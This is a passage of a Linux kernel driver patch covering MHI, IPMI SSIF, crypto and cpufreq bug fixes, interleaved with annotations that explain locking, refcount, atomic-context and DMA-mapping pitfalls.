+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index 1dc8a3557a464..9c42886818418 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -196,9 +196,11 @@ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_ele
+ 		mhi_ep_mmio_disable_chdb(mhi_cntrl, ch_id);
+ 
+ 		/* Send channel disconnect status to client drivers */
+-		result.transaction_status = -ENOTCONN;
+-		result.bytes_xferd = 0;
+-		mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		if (mhi_chan->xfer_cb) {
++			result.transaction_status = -ENOTCONN;
++			result.bytes_xferd = 0;
++			mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		}
+ 
+ 		/* Set channel state to STOP */
+ 		mhi_chan->state = MHI_CH_STATE_STOP;
+@@ -228,9 +230,11 @@ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_ele
+ 		mhi_ep_ring_reset(mhi_cntrl, ch_ring);
+ 
+ 		/* Send channel disconnect status to client driver */
+-		result.transaction_status = -ENOTCONN;
+-		result.bytes_xferd = 0;
+-		mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		if (mhi_chan->xfer_cb) {
++			result.transaction_status = -ENOTCONN;
++			result.bytes_xferd = 0;
++			mhi_chan->xfer_cb(mhi_chan->mhi_dev, &result);
++		}
+ 
+ 		/* Set channel state to DISABLED */
+ 		mhi_chan->state = MHI_CH_STATE_DISABLED;
+@@ -719,24 +723,37 @@ static void mhi_ep_ch_ring_worker(struct work_struct *work)
+ 		list_del(&itr->node);
+ 		ring = itr->ring;
+ 
++		chan = &mhi_cntrl->mhi_chan[ring->ch_id];
++		mutex_lock(&chan->lock);
++
++		/*
++		 * The ring could have stopped while we waited to grab chan->lock,
++		 * so do a sanity check before going further.
++		 */
++		if (!ring->started) {
++			mutex_unlock(&chan->lock);
++			kfree(itr);
++			continue;
++		}
++
+ 		/* Update the write offset for the ring */
+ 		ret = mhi_ep_update_wr_offset(ring);
+ 		if (ret) {
+ 			dev_err(dev, "Error updating write offset for ring\n");
++			mutex_unlock(&chan->lock);
+ 			kfree(itr);
+ 			continue;
+ 		}
+ 
+ 		/* Sanity check to make sure there are elements in the ring */
+ 		if (ring->rd_offset == ring->wr_offset) {
++			mutex_unlock(&chan->lock);
+ 			kfree(itr);
+ 			continue;
+ 		}
+ 
+ 		el = &ring->ring_cache[ring->rd_offset];
+-		chan = &mhi_cntrl->mhi_chan[ring->ch_id];
+ 
+-		mutex_lock(&chan->lock);
+ 		dev_dbg(dev, "Processing the ring for channel (%u)\n", ring->ch_id);
+ 		ret = mhi_ep_process_ch_ring(ring, el);
+ 		if (ret) {
+@@ -1119,6 +1136,7 @@ void mhi_ep_suspend_channels(struct mhi_ep_cntrl *mhi_cntrl)
+ 
+ 		dev_dbg(&mhi_chan->mhi_dev->dev, "Suspending channel\n");
+ 		/* Set channel state to SUSPENDED */
++		mhi_chan->state = MHI_CH_STATE_SUSPENDED;
+ 		tmp &= ~CHAN_CTX_CHSTATE_MASK;
+ 		tmp |= FIELD_PREP(CHAN_CTX_CHSTATE_MASK, MHI_CH_STATE_SUSPENDED);
+ 		mhi_cntrl->ch_ctx_cache[i].chcfg = cpu_to_le32(tmp);
+@@ -1148,6 +1166,7 @@ void mhi_ep_resume_channels(struct mhi_ep_cntrl *mhi_cntrl)
+ 
+ 		dev_dbg(&mhi_chan->mhi_dev->dev, "Resuming channel\n");
+ 		/* Set channel state to RUNNING */
++		mhi_chan->state = MHI_CH_STATE_RUNNING;
+ 		tmp &= ~CHAN_CTX_CHSTATE_MASK;
+ 		tmp |= FIELD_PREP(CHAN_CTX_CHSTATE_MASK, MHI_CH_STATE_RUNNING);
+ 		mhi_cntrl->ch_ctx_cache[i].chcfg = cpu_to_le32(tmp);
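[Annotation] The ch_ring_worker fix illustrates the recheck-under-lock rule: state observed before mutex_lock() may be stale by the time the lock is finally acquired, so anything that can change concurrently (here, ring->started) must be re-validated afterwards. Schematically, with hypothetical types:

static void demo_ring_worker(struct demo_chan *chan)
{
	mutex_lock(&chan->lock);
	/* the channel may have been stopped while we slept on the lock */
	if (!chan->ring_started) {
		mutex_unlock(&chan->lock);
		return;
	}
	demo_process_ring(chan);		/* hypothetical */
	mutex_unlock(&chan->lock);
}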
+diff --git a/drivers/char/applicom.c b/drivers/char/applicom.c
+index 36203d3fa6ea6..69314532f38cd 100644
+--- a/drivers/char/applicom.c
++++ b/drivers/char/applicom.c
+@@ -197,8 +197,10 @@ static int __init applicom_init(void)
+ 		if (!pci_match_id(applicom_pci_tbl, dev))
+ 			continue;
+ 		
+-		if (pci_enable_device(dev))
++		if (pci_enable_device(dev)) {
++			pci_dev_put(dev);
+ 			return -EIO;
++		}
+ 
+ 		RamIO = ioremap(pci_resource_start(dev, 0), LEN_RAM_IO);
+ 
+@@ -207,6 +209,7 @@ static int __init applicom_init(void)
+ 				"space at 0x%llx\n",
+ 				(unsigned long long)pci_resource_start(dev, 0));
+ 			pci_disable_device(dev);
++			pci_dev_put(dev);
+ 			return -EIO;
+ 		}
+ 
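[Annotation] The applicom fix addresses the usual for_each_pci_dev() pitfall: the iterator hands out each device with an elevated refcount and only drops it when advancing to the next one, so any early return from the loop body must pci_dev_put() the current device itself. A minimal sketch:

	struct pci_dev *dev = NULL;

	while ((dev = pci_get_device(PCI_ANY_ID, PCI_ANY_ID, dev))) {
		if (pci_enable_device(dev)) {
			pci_dev_put(dev);	/* drop the iterator's reference */
			return -EIO;
		}
		/*
		 * Normal handling: the next pci_get_device() call puts
		 * this device's reference for us.
		 */
	}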
+diff --git a/drivers/char/ipmi/ipmi_ipmb.c b/drivers/char/ipmi/ipmi_ipmb.c
+index 7c1aee5e11b77..3f1c9f1573e78 100644
+--- a/drivers/char/ipmi/ipmi_ipmb.c
++++ b/drivers/char/ipmi/ipmi_ipmb.c
+@@ -27,7 +27,7 @@ MODULE_PARM_DESC(bmcaddr, "Address to use for BMC.");
+ 
+ static unsigned int retry_time_ms = 250;
+ module_param(retry_time_ms, uint, 0644);
+-MODULE_PARM_DESC(max_retries, "Timeout time between retries, in milliseconds.");
++MODULE_PARM_DESC(retry_time_ms, "Timeout time between retries, in milliseconds.");
+ 
+ static unsigned int max_retries = 1;
+ module_param(max_retries, uint, 0644);
+diff --git a/drivers/char/ipmi/ipmi_ssif.c b/drivers/char/ipmi/ipmi_ssif.c
+index 4bfd1e3066162..f49d2c2ef3cfd 100644
+--- a/drivers/char/ipmi/ipmi_ssif.c
++++ b/drivers/char/ipmi/ipmi_ssif.c
+@@ -74,7 +74,8 @@
+ /*
+  * Timer values
+  */
+-#define SSIF_MSG_USEC		60000	/* 60ms between message tries. */
++#define SSIF_MSG_USEC		60000	/* 60ms between message tries (T3). */
++#define SSIF_REQ_RETRY_USEC	60000	/* 60ms between send retries (T6). */
+ #define SSIF_MSG_PART_USEC	5000	/* 5ms for a message part */
+ 
+ /* How many times do we retry sending/receiving the message. */
+@@ -82,7 +83,9 @@
+ #define	SSIF_RECV_RETRIES	250
+ 
+ #define SSIF_MSG_MSEC		(SSIF_MSG_USEC / 1000)
++#define SSIF_REQ_RETRY_MSEC	(SSIF_REQ_RETRY_USEC / 1000)
+ #define SSIF_MSG_JIFFIES	((SSIF_MSG_USEC * 1000) / TICK_NSEC)
++#define SSIF_REQ_RETRY_JIFFIES	((SSIF_REQ_RETRY_USEC * 1000) / TICK_NSEC)
+ #define SSIF_MSG_PART_JIFFIES	((SSIF_MSG_PART_USEC * 1000) / TICK_NSEC)
+ 
+ /*
+@@ -92,7 +95,7 @@
+ #define SSIF_WATCH_WATCHDOG_TIMEOUT	msecs_to_jiffies(250)
+ 
+ enum ssif_intf_state {
+-	SSIF_NORMAL,
++	SSIF_IDLE,
+ 	SSIF_GETTING_FLAGS,
+ 	SSIF_GETTING_EVENTS,
+ 	SSIF_CLEARING_FLAGS,
+@@ -100,8 +103,8 @@ enum ssif_intf_state {
+ 	/* FIXME - add watchdog stuff. */
+ };
+ 
+-#define SSIF_IDLE(ssif)	 ((ssif)->ssif_state == SSIF_NORMAL \
+-			  && (ssif)->curr_msg == NULL)
++#define IS_SSIF_IDLE(ssif) ((ssif)->ssif_state == SSIF_IDLE \
++			    && (ssif)->curr_msg == NULL)
+ 
+ /*
+  * Indexes into stats[] in ssif_info below.
+@@ -229,6 +232,9 @@ struct ssif_info {
+ 	bool		    got_alert;
+ 	bool		    waiting_alert;
+ 
++	/* Used to inform the timeout that it should do a resend. */
++	bool		    do_resend;
++
+ 	/*
+ 	 * If set to true, this will request events the next time the
+ 	 * state machine is idle.
+@@ -348,9 +354,9 @@ static void return_hosed_msg(struct ssif_info *ssif_info,
+ 
+ /*
+  * Must be called with the message lock held.  This will release the
+- * message lock.  Note that the caller will check SSIF_IDLE and start a
+- * new operation, so there is no need to check for new messages to
+- * start in here.
++ * message lock.  Note that the caller will check IS_SSIF_IDLE and
++ * start a new operation, so there is no need to check for new
++ * messages to start in here.
+  */
+ static void start_clear_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ {
+@@ -367,7 +373,7 @@ static void start_clear_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ 
+ 	if (start_send(ssif_info, msg, 3) != 0) {
+ 		/* Error, just go to normal state. */
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 	}
+ }
+ 
+@@ -382,7 +388,7 @@ static void start_flag_fetch(struct ssif_info *ssif_info, unsigned long *flags)
+ 	mb[0] = (IPMI_NETFN_APP_REQUEST << 2);
+ 	mb[1] = IPMI_GET_MSG_FLAGS_CMD;
+ 	if (start_send(ssif_info, mb, 2) != 0)
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ }
+ 
+ static void check_start_send(struct ssif_info *ssif_info, unsigned long *flags,
+@@ -393,7 +399,7 @@ static void check_start_send(struct ssif_info *ssif_info, unsigned long *flags,
+ 
+ 		flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
+ 		ssif_info->curr_msg = NULL;
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		ipmi_free_smi_msg(msg);
+ 	}
+@@ -407,7 +413,7 @@ static void start_event_fetch(struct ssif_info *ssif_info, unsigned long *flags)
+ 
+ 	msg = ipmi_alloc_smi_msg();
+ 	if (!msg) {
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		return;
+ 	}
+@@ -430,7 +436,7 @@ static void start_recv_msg_fetch(struct ssif_info *ssif_info,
+ 
+ 	msg = ipmi_alloc_smi_msg();
+ 	if (!msg) {
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		return;
+ 	}
+@@ -448,9 +454,9 @@ static void start_recv_msg_fetch(struct ssif_info *ssif_info,
+ 
+ /*
+  * Must be called with the message lock held.  This will release the
+- * message lock.  Note that the caller will check SSIF_IDLE and start a
+- * new operation, so there is no need to check for new messages to
+- * start in here.
++ * message lock.  Note that the caller will check IS_SSIF_IDLE and
++ * start a new operation, so there is no need to check for new
++ * messages to start in here.
+  */
+ static void handle_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ {
+@@ -466,7 +472,7 @@ static void handle_flags(struct ssif_info *ssif_info, unsigned long *flags)
+ 		/* Events available. */
+ 		start_event_fetch(ssif_info, flags);
+ 	else {
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 	}
+ }
+@@ -538,22 +544,28 @@ static void start_get(struct ssif_info *ssif_info)
+ 		  ssif_info->recv, I2C_SMBUS_BLOCK_DATA);
+ }
+ 
++static void start_resend(struct ssif_info *ssif_info);
++
+ static void retry_timeout(struct timer_list *t)
+ {
+ 	struct ssif_info *ssif_info = from_timer(ssif_info, t, retry_timer);
+ 	unsigned long oflags, *flags;
+-	bool waiting;
++	bool waiting, resend;
+ 
+ 	if (ssif_info->stopping)
+ 		return;
+ 
+ 	flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
++	resend = ssif_info->do_resend;
++	ssif_info->do_resend = false;
+ 	waiting = ssif_info->waiting_alert;
+ 	ssif_info->waiting_alert = false;
+ 	ipmi_ssif_unlock_cond(ssif_info, flags);
+ 
+ 	if (waiting)
+ 		start_get(ssif_info);
++	if (resend)
++		start_resend(ssif_info);
+ }
+ 
+ static void watch_timeout(struct timer_list *t)
+@@ -568,7 +580,7 @@ static void watch_timeout(struct timer_list *t)
+ 	if (ssif_info->watch_timeout) {
+ 		mod_timer(&ssif_info->watch_timer,
+ 			  jiffies + ssif_info->watch_timeout);
+-		if (SSIF_IDLE(ssif_info)) {
++		if (IS_SSIF_IDLE(ssif_info)) {
+ 			start_flag_fetch(ssif_info, flags); /* Releases lock */
+ 			return;
+ 		}
+@@ -602,8 +614,6 @@ static void ssif_alert(struct i2c_client *client, enum i2c_alert_protocol type,
+ 		start_get(ssif_info);
+ }
+ 
+-static int start_resend(struct ssif_info *ssif_info);
+-
+ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 			     unsigned char *data, unsigned int len)
+ {
+@@ -756,7 +766,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 	}
+ 
+ 	switch (ssif_info->ssif_state) {
+-	case SSIF_NORMAL:
++	case SSIF_IDLE:
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		if (!msg)
+ 			break;
+@@ -774,7 +784,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 			 * Error fetching flags, or invalid length,
+ 			 * just give up for now.
+ 			 */
+-			ssif_info->ssif_state = SSIF_NORMAL;
++			ssif_info->ssif_state = SSIF_IDLE;
+ 			ipmi_ssif_unlock_cond(ssif_info, flags);
+ 			dev_warn(&ssif_info->client->dev,
+ 				 "Error getting flags: %d %d, %x\n",
+@@ -809,7 +819,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 				 "Invalid response clearing flags: %x %x\n",
+ 				 data[0], data[1]);
+ 		}
+-		ssif_info->ssif_state = SSIF_NORMAL;
++		ssif_info->ssif_state = SSIF_IDLE;
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		break;
+ 
+@@ -887,7 +897,7 @@ static void msg_done_handler(struct ssif_info *ssif_info, int result,
+ 	}
+ 
+ 	flags = ipmi_ssif_lock_cond(ssif_info, &oflags);
+-	if (SSIF_IDLE(ssif_info) && !ssif_info->stopping) {
++	if (IS_SSIF_IDLE(ssif_info) && !ssif_info->stopping) {
+ 		if (ssif_info->req_events)
+ 			start_event_fetch(ssif_info, flags);
+ 		else if (ssif_info->req_flags)
+@@ -909,31 +919,23 @@ static void msg_written_handler(struct ssif_info *ssif_info, int result,
+ 	if (result < 0) {
+ 		ssif_info->retries_left--;
+ 		if (ssif_info->retries_left > 0) {
+-			if (!start_resend(ssif_info)) {
+-				ssif_inc_stat(ssif_info, send_retries);
+-				return;
+-			}
+-			/* request failed, just return the error. */
+-			ssif_inc_stat(ssif_info, send_errors);
+-
+-			if (ssif_info->ssif_debug & SSIF_DEBUG_MSG)
+-				dev_dbg(&ssif_info->client->dev,
+-					"%s: Out of retries\n", __func__);
+-			msg_done_handler(ssif_info, -EIO, NULL, 0);
++			/*
++			 * Wait the retry timeout time per the spec,
++			 * then redo the send.
++			 */
++			ssif_info->do_resend = true;
++			mod_timer(&ssif_info->retry_timer,
++				  jiffies + SSIF_REQ_RETRY_JIFFIES);
+ 			return;
+ 		}
+ 
+ 		ssif_inc_stat(ssif_info, send_errors);
+ 
+-		/*
+-		 * Got an error on transmit, let the done routine
+-		 * handle it.
+-		 */
+ 		if (ssif_info->ssif_debug & SSIF_DEBUG_MSG)
+ 			dev_dbg(&ssif_info->client->dev,
+-				"%s: Error  %d\n", __func__, result);
++				"%s: Out of retries\n", __func__);
+ 
+-		msg_done_handler(ssif_info, result, NULL, 0);
++		msg_done_handler(ssif_info, -EIO, NULL, 0);
+ 		return;
+ 	}
+ 
+@@ -996,7 +998,7 @@ static void msg_written_handler(struct ssif_info *ssif_info, int result,
+ 	}
+ }
+ 
+-static int start_resend(struct ssif_info *ssif_info)
++static void start_resend(struct ssif_info *ssif_info)
+ {
+ 	int command;
+ 
+@@ -1021,7 +1023,6 @@ static int start_resend(struct ssif_info *ssif_info)
+ 
+ 	ssif_i2c_send(ssif_info, msg_written_handler, I2C_SMBUS_WRITE,
+ 		   command, ssif_info->data, I2C_SMBUS_BLOCK_DATA);
+-	return 0;
+ }
+ 
+ static int start_send(struct ssif_info *ssif_info,
+@@ -1036,7 +1037,8 @@ static int start_send(struct ssif_info *ssif_info,
+ 	ssif_info->retries_left = SSIF_SEND_RETRIES;
+ 	memcpy(ssif_info->data + 1, data, len);
+ 	ssif_info->data_len = len;
+-	return start_resend(ssif_info);
++	start_resend(ssif_info);
++	return 0;
+ }
+ 
+ /* Must be called with the message lock held. */
+@@ -1046,7 +1048,7 @@ static void start_next_msg(struct ssif_info *ssif_info, unsigned long *flags)
+ 	unsigned long oflags;
+ 
+  restart:
+-	if (!SSIF_IDLE(ssif_info)) {
++	if (!IS_SSIF_IDLE(ssif_info)) {
+ 		ipmi_ssif_unlock_cond(ssif_info, flags);
+ 		return;
+ 	}
+@@ -1269,7 +1271,7 @@ static void shutdown_ssif(void *send_info)
+ 	dev_set_drvdata(&ssif_info->client->dev, NULL);
+ 
+ 	/* make sure the driver is not looking for flags any more. */
+-	while (ssif_info->ssif_state != SSIF_NORMAL)
++	while (ssif_info->ssif_state != SSIF_IDLE)
+ 		schedule_timeout(1);
+ 
+ 	ssif_info->stopping = true;
+@@ -1334,8 +1336,10 @@ static int do_cmd(struct i2c_client *client, int len, unsigned char *msg,
+ 	ret = i2c_smbus_write_block_data(client, SSIF_IPMI_REQUEST, len, msg);
+ 	if (ret) {
+ 		retry_cnt--;
+-		if (retry_cnt > 0)
++		if (retry_cnt > 0) {
++			msleep(SSIF_REQ_RETRY_MSEC);
+ 			goto retry1;
++		}
+ 		return -ENODEV;
+ 	}
+ 
+@@ -1476,8 +1480,10 @@ retry_write:
+ 					 32, msg);
+ 	if (ret) {
+ 		retry_cnt--;
+-		if (retry_cnt > 0)
++		if (retry_cnt > 0) {
++			msleep(SSIF_REQ_RETRY_MSEC);
+ 			goto retry_write;
++		}
+ 		dev_err(&client->dev, "Could not write multi-part start, though the BMC said it could handle it.  Just limit sends to one part.\n");
+ 		return ret;
+ 	}
+@@ -1839,7 +1845,7 @@ static int ssif_probe(struct i2c_client *client)
+ 	}
+ 
+ 	spin_lock_init(&ssif_info->lock);
+-	ssif_info->ssif_state = SSIF_NORMAL;
++	ssif_info->ssif_state = SSIF_IDLE;
+ 	timer_setup(&ssif_info->retry_timer, retry_timeout, 0);
+ 	timer_setup(&ssif_info->watch_timer, watch_timeout, 0);
+ 
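[Annotation] The biggest behavioral change in the ipmi_ssif hunks is that a failed send is no longer retried inline from the I2C completion path: the handler only records the intent and arms the retry timer, so the resend happens after the T6 retry interval the spec requires. A sketch of that deferral, with hypothetical names:

static void demo_write_done(struct demo_info *info, int result)
{
	if (result < 0 && --info->retries_left > 0) {
		/* defer: the timer handler performs the actual resend */
		info->do_resend = true;
		mod_timer(&info->retry_timer,
			  jiffies + DEMO_REQ_RETRY_JIFFIES);
		return;
	}
	/* out of retries: complete the message with -EIO (not shown) */
}

static void demo_retry_timeout(struct timer_list *t)
{
	struct demo_info *info = from_timer(info, t, retry_timer);

	if (info->do_resend) {
		info->do_resend = false;
		demo_start_resend(info);	/* hypothetical */
	}
}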
+diff --git a/drivers/char/pcmcia/cm4000_cs.c b/drivers/char/pcmcia/cm4000_cs.c
+index adaec8fd4b16c..e656f42a28ac2 100644
+--- a/drivers/char/pcmcia/cm4000_cs.c
++++ b/drivers/char/pcmcia/cm4000_cs.c
+@@ -529,7 +529,8 @@ static int set_protocol(struct cm4000_dev *dev, struct ptsreq *ptsreq)
+ 			DEBUGP(5, dev, "NumRecBytes is valid\n");
+ 			break;
+ 		}
+-		usleep_range(10000, 11000);
++		/* cannot sleep as this is in atomic context */
++		mdelay(10);
+ 	}
+ 	if (i == 100) {
+ 		DEBUGP(5, dev, "Timeout waiting for NumRecBytes getting "
+@@ -549,7 +550,8 @@ static int set_protocol(struct cm4000_dev *dev, struct ptsreq *ptsreq)
+ 			}
+ 			break;
+ 		}
+-		usleep_range(10000, 11000);
++		/* cannot sleep as this is in atomic context */
++		mdelay(10);
+ 	}
+ 
+ 	/* check whether it is a short PTS reply? */
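[Annotation] The cm4000_cs change swaps usleep_range() for mdelay() because this polling runs in atomic context, where sleeping primitives are forbidden; a busy-wait delay is the legal, if expensive, substitute. Schematically:

	spin_lock_irqsave(&dev->lock, flags);	/* atomic from here on */
	while (!demo_ready(dev) && retries--)	/* demo_ready() is hypothetical */
		mdelay(10);			/* busy-waits; usleep_range() would sleep */
	spin_unlock_irqrestore(&dev->lock, flags);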
+diff --git a/drivers/clocksource/timer-riscv.c b/drivers/clocksource/timer-riscv.c
+index a0d66fabf0732..a01c2bd241349 100644
+--- a/drivers/clocksource/timer-riscv.c
++++ b/drivers/clocksource/timer-riscv.c
+@@ -177,6 +177,11 @@ static int __init riscv_timer_init_dt(struct device_node *n)
+ 		return error;
+ 	}
+ 
++	if (riscv_isa_extension_available(NULL, SSTC)) {
++		pr_info("Timer interrupt in S-mode is available via sstc extension\n");
++		static_branch_enable(&riscv_sstc_available);
++	}
++
+ 	error = cpuhp_setup_state(CPUHP_AP_RISCV_TIMER_STARTING,
+ 			 "clockevents/riscv/timer:starting",
+ 			 riscv_timer_starting_cpu, riscv_timer_dying_cpu);
+@@ -184,11 +189,6 @@ static int __init riscv_timer_init_dt(struct device_node *n)
+ 		pr_err("cpu hp setup state failed for RISCV timer [%d]\n",
+ 		       error);
+ 
+-	if (riscv_isa_extension_available(NULL, SSTC)) {
+-		pr_info("Timer interrupt in S-mode is available via sstc extension\n");
+-		static_branch_enable(&riscv_sstc_available);
+-	}
+-
+ 	return error;
+ }
+ 
+diff --git a/drivers/cpufreq/davinci-cpufreq.c b/drivers/cpufreq/davinci-cpufreq.c
+index 9e97f60f81996..ebb3a81026816 100644
+--- a/drivers/cpufreq/davinci-cpufreq.c
++++ b/drivers/cpufreq/davinci-cpufreq.c
+@@ -133,12 +133,14 @@ static int __init davinci_cpufreq_probe(struct platform_device *pdev)
+ 
+ static int __exit davinci_cpufreq_remove(struct platform_device *pdev)
+ {
++	cpufreq_unregister_driver(&davinci_driver);
++
+ 	clk_put(cpufreq.armclk);
+ 
+ 	if (cpufreq.asyncclk)
+ 		clk_put(cpufreq.asyncclk);
+ 
+-	return cpufreq_unregister_driver(&davinci_driver);
++	return 0;
+ }
+ 
+ static struct platform_driver davinci_cpufreq_driver = {
+diff --git a/drivers/cpuidle/Kconfig.arm b/drivers/cpuidle/Kconfig.arm
+index 747aa537389b9..f0714a32921e6 100644
+--- a/drivers/cpuidle/Kconfig.arm
++++ b/drivers/cpuidle/Kconfig.arm
+@@ -102,6 +102,7 @@ config ARM_MVEBU_V7_CPUIDLE
+ config ARM_TEGRA_CPUIDLE
+ 	bool "CPU Idle Driver for NVIDIA Tegra SoCs"
+ 	depends on (ARCH_TEGRA || COMPILE_TEST) && !ARM64 && MMU
++	depends on ARCH_SUSPEND_POSSIBLE
+ 	select ARCH_NEEDS_CPU_IDLE_COUPLED if SMP
+ 	select ARM_CPU_SUSPEND
+ 	help
+@@ -110,6 +111,7 @@ config ARM_TEGRA_CPUIDLE
+ config ARM_QCOM_SPM_CPUIDLE
+ 	bool "CPU Idle Driver for Qualcomm Subsystem Power Manager (SPM)"
+ 	depends on (ARCH_QCOM || COMPILE_TEST) && !ARM64 && MMU
++	depends on ARCH_SUSPEND_POSSIBLE
+ 	select ARM_CPU_SUSPEND
+ 	select CPU_IDLE_MULTIPLE_DRIVERS
+ 	select DT_IDLE_STATES
+diff --git a/drivers/crypto/amcc/crypto4xx_core.c b/drivers/crypto/amcc/crypto4xx_core.c
+index 280f4b0e71334..50dc783821b69 100644
+--- a/drivers/crypto/amcc/crypto4xx_core.c
++++ b/drivers/crypto/amcc/crypto4xx_core.c
+@@ -522,7 +522,6 @@ static void crypto4xx_cipher_done(struct crypto4xx_device *dev,
+ {
+ 	struct skcipher_request *req;
+ 	struct scatterlist *dst;
+-	dma_addr_t addr;
+ 
+ 	req = skcipher_request_cast(pd_uinfo->async_req);
+ 
+@@ -531,8 +530,8 @@ static void crypto4xx_cipher_done(struct crypto4xx_device *dev,
+ 					  req->cryptlen, req->dst);
+ 	} else {
+ 		dst = pd_uinfo->dest_va;
+-		addr = dma_map_page(dev->core_dev->device, sg_page(dst),
+-				    dst->offset, dst->length, DMA_FROM_DEVICE);
++		dma_unmap_page(dev->core_dev->device, pd->dest, dst->length,
++			       DMA_FROM_DEVICE);
+ 	}
+ 
+ 	if (pd_uinfo->sa_va->sa_command_0.bf.save_iv == SA_SAVE_IV) {
+@@ -557,10 +556,9 @@ static void crypto4xx_ahash_done(struct crypto4xx_device *dev,
+ 	struct ahash_request *ahash_req;
+ 
+ 	ahash_req = ahash_request_cast(pd_uinfo->async_req);
+-	ctx  = crypto_tfm_ctx(ahash_req->base.tfm);
++	ctx = crypto_ahash_ctx(crypto_ahash_reqtfm(ahash_req));
+ 
+-	crypto4xx_copy_digest_to_dst(ahash_req->result, pd_uinfo,
+-				     crypto_tfm_ctx(ahash_req->base.tfm));
++	crypto4xx_copy_digest_to_dst(ahash_req->result, pd_uinfo, ctx);
+ 	crypto4xx_ret_sg_desc(dev, pd_uinfo);
+ 
+ 	if (pd_uinfo->state & PD_ENTRY_BUSY)
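[Annotation] The crypto4xx fix is a classic map/unmap pairing bug: the completion handler called dma_map_page() a second time instead of unmapping the submit-time mapping, leaking one mapping per request while creating another. The invariant is that completion undoes exactly what submission set up, sketched here with hypothetical names:

static int demo_submit(struct demo_dev *d, struct scatterlist *dst)
{
	d->dest_dma = dma_map_page(d->dev, sg_page(dst), dst->offset,
				   dst->length, DMA_FROM_DEVICE);
	return dma_mapping_error(d->dev, d->dest_dma) ? -ENOMEM : 0;
}

static void demo_complete(struct demo_dev *d, struct scatterlist *dst)
{
	/* undo, never redo, the submit-time mapping */
	dma_unmap_page(d->dev, d->dest_dma, dst->length, DMA_FROM_DEVICE);
}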
+diff --git a/drivers/crypto/ccp/ccp-dmaengine.c b/drivers/crypto/ccp/ccp-dmaengine.c
+index 9f753cb4f5f18..b386a7063818b 100644
+--- a/drivers/crypto/ccp/ccp-dmaengine.c
++++ b/drivers/crypto/ccp/ccp-dmaengine.c
+@@ -642,14 +642,26 @@ static void ccp_dma_release(struct ccp_device *ccp)
+ 		chan = ccp->ccp_dma_chan + i;
+ 		dma_chan = &chan->dma_chan;
+ 
+-		if (dma_chan->client_count)
+-			dma_release_channel(dma_chan);
+-
+ 		tasklet_kill(&chan->cleanup_tasklet);
+ 		list_del_rcu(&dma_chan->device_node);
+ 	}
+ }
+ 
++static void ccp_dma_release_channels(struct ccp_device *ccp)
++{
++	struct ccp_dma_chan *chan;
++	struct dma_chan *dma_chan;
++	unsigned int i;
++
++	for (i = 0; i < ccp->cmd_q_count; i++) {
++		chan = ccp->ccp_dma_chan + i;
++		dma_chan = &chan->dma_chan;
++
++		if (dma_chan->client_count)
++			dma_release_channel(dma_chan);
++	}
++}
++
+ int ccp_dmaengine_register(struct ccp_device *ccp)
+ {
+ 	struct ccp_dma_chan *chan;
+@@ -770,8 +782,9 @@ void ccp_dmaengine_unregister(struct ccp_device *ccp)
+ 	if (!dmaengine)
+ 		return;
+ 
+-	ccp_dma_release(ccp);
++	ccp_dma_release_channels(ccp);
+ 	dma_async_device_unregister(dma_dev);
++	ccp_dma_release(ccp);
+ 
+ 	kmem_cache_destroy(ccp->dma_desc_cache);
+ 	kmem_cache_destroy(ccp->dma_cmd_cache);
+diff --git a/drivers/crypto/ccp/sev-dev.c b/drivers/crypto/ccp/sev-dev.c
+index 06fc7156c04f3..3e583f0324874 100644
+--- a/drivers/crypto/ccp/sev-dev.c
++++ b/drivers/crypto/ccp/sev-dev.c
+@@ -26,6 +26,7 @@
+ #include <linux/fs_struct.h>
+ 
+ #include <asm/smp.h>
++#include <asm/cacheflush.h>
+ 
+ #include "psp-dev.h"
+ #include "sev-dev.h"
+@@ -881,7 +882,14 @@ static int sev_ioctl_do_get_id2(struct sev_issue_cmd *argp)
+ 	input_address = (void __user *)input.address;
+ 
+ 	if (input.address && input.length) {
+-		id_blob = kzalloc(input.length, GFP_KERNEL);
++		/*
++		 * The length of the ID shouldn't be assumed by software since
++		 * it may change in the future.  The allocation size is limited
++		 * to 1 << (PAGE_SHIFT + MAX_ORDER - 1) by the page allocator.
++		 * If the allocation fails, simply return ENOMEM rather than
++		 * warning in the kernel log.
++		 */
++		id_blob = kzalloc(input.length, GFP_KERNEL | __GFP_NOWARN);
+ 		if (!id_blob)
+ 			return -ENOMEM;
+ 
+@@ -1327,7 +1335,10 @@ void sev_pci_init(void)
+ 
+ 	/* Obtain the TMR memory area for SEV-ES use */
+ 	sev_es_tmr = sev_fw_alloc(SEV_ES_TMR_SIZE);
+-	if (!sev_es_tmr)
++	if (sev_es_tmr)
++		/* Must flush the cache before giving it to the firmware */
